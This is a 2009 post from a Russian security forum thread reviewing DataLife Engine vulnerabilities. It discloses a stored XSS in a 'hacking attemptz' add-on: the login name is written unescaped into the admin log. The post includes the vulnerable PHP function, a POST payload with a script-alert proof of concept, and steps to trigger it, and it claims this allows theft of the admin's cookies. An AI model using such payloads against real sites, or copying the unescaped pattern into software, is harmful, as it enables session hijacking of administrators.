HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Перезагрузить страницу [ Обзор уязвимостей DataLife Engine ]
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #11  
Старый 27.02.2009, 17:18
-Hormold-
Постоянный
Регистрация: 29.09.2007
Сообщений: 617
С нами: 9798086

Репутация: 999


По умолчанию
hacking attemptz
Версия: v.1.0


Активная XSS от любого пользователя(100% кража куки админа)

Уязвимый скрипт: hacking_attemptz_fnct.php
Запрос: login_name=<h1><script>alert(/xss/);</script>XSS</h1>&login_password=1234
Метод: POST
Уязвимый кусок кода:
PHP код:
function log_user($host)
   {
      global $ip;
         $log_date date('d.m.Y');
         $log_time date('H:i:s');
      $log_info "

<tr>
 <td align='center'>".$_POST['login_name']."</td>
 <td align='center'>$log_date</td>
 <td align='center'>$log_time</td>
 <td align='center'>$ip</td>
 <td align='center'>".gethostbyaddr($ip)."</td>
</hr>
"
Теперь попробуйте залогиниться с логином <h1>xss</h1> и любым пассом!
Смотрим админку, и вот! XSS видна
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор уязвимостей WordPress ] ettee Веб-уязвимости 383 23.11.2019 05:00
Обзор уязвимостей в платных CMS ZAMUT Веб-уязвимости 90 03.12.2017 01:35
DataLife Engine v.6.5. Null Student :) ПО для Web разработчика 31 23.02.2008 15:36
[ Обзор уязвимостей miniBB ] -=lebed=- Уязвимости CMS / форумов 3 12.01.2008 20:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.